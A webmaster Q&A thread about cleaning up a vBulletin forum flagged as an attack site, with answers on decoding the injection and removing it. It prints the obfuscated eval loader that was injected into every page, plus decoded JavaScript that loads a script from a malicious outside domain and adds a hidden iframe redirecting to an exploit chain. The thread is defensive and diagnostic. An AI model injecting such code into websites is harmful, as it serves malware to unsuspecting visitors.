Remove Malware from Website

Question

My website, 3dsforums.com, has been marked as an attack site for containing malware. According to Google Webmaster Tools, this is the suspected code that has been injected onto every page:

<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>

As such, I have two questions:

Is this actually the offending code?

And how do I remove it?

I can't seem to find it via the templates in vBulletin, or through phpmyadmin, so I'm lost as to what I should do.

Thanks for any help.

Answer 1

JS Beautifier decompresses that as this:

var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);

It looks suspicious (who would obfuscate that?), so I would assume that yes, it's the problem, and you should remove it.

Edit: Now that the malicious site is back up, I can analyze the rest: it appears to add an iframe :

var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);

Kind of strange to be appending it to the head .

The in.cgi script appears to redirect to Google if the User-Agent is not very exploitable. Otherwise, it redirects to another malicious website.

It continues branching off with many iframe s. Many of them do nothing (although at that point, I was only trying the User-Agent for MSIE 6 on WinXP), but I eventually wound up with two Java applets. When I decompiled them, all the names were mangled and I didn't bother to try to figure out what it's doing.

Answer 2

First thing you should do is to change your FTP or SSH login and password.

The above looks like an FTP exploit. Looks like either you are out of date with your OS updates or you are letting whole world write to your files.

Even though you overwrite your files the problem may come back. So I strongly suggest to check

1. note the last modified date of the files in question.
2. check your FTP, SSH, Access logs to see if you can find something fishy. 1a. Immediately remove write access to all the site's files. Do this as a precaution just to be safe from a similar attack. 1b. Overwrite your files from Backup
3. if your apache or any webserver that you are using does not have a pending update.
4. Check the file permission for you website
5. Change your FTP password immediately

Advise: change your passwords to something strong. eg KLioof*(&^paswl

Answer 3

It was actually hiding in includes/functions.php on lines 6844 and 6845, the two lines were were replacing </head> with their script+</head>

Tough one to find and smart too.

Answer 4

I resolved this problem. You must find and delete Base64 function with shady string in site files. It decode this script from string.